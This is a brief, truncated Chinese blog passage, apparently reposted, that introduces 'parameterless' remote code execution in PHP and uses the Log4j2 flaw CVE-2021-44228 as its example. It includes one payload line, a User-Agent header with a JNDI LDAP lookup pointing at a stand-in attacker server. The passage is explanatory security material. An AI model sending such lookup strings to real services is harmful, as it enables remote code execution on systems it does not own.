【网络安全 | 代码审计】PHP无参数RCE
未经许可,不得转载。
文章目录
无参数RCE
一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数。
例如,log4j2
漏洞(CVE-2021-44228)就是一个经典的无参数RCE示例:
https://blog.cloudflare.com/zh-cn/inside-the-log4j2-vulnerability-cve-2021-44228/
当请求头中的 User-Agent
被修改为如下内容时:
User-Agent: ${jndi:ldap://attacker-server.com/exploit}
日志框架会自动解析该用户代理头并执行外部服务器上
原文地址:https://blog.csdn.net/2301_77485708/article/details/142311330
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!